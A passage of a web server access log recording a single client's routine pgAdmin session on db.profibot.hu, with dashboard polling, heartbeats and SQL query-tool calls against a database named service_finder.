"https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:56 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:40:57 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:40:58 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:41:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:41:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:42:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:42:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:40 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:42 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:44 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 323] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 308] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:47 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:43:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:43:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:44:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:45:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:45:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:46:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:46:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:46:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:47:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:47:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:30 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:30 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:32 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:32 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:33 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:33 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:48:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:48:37 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 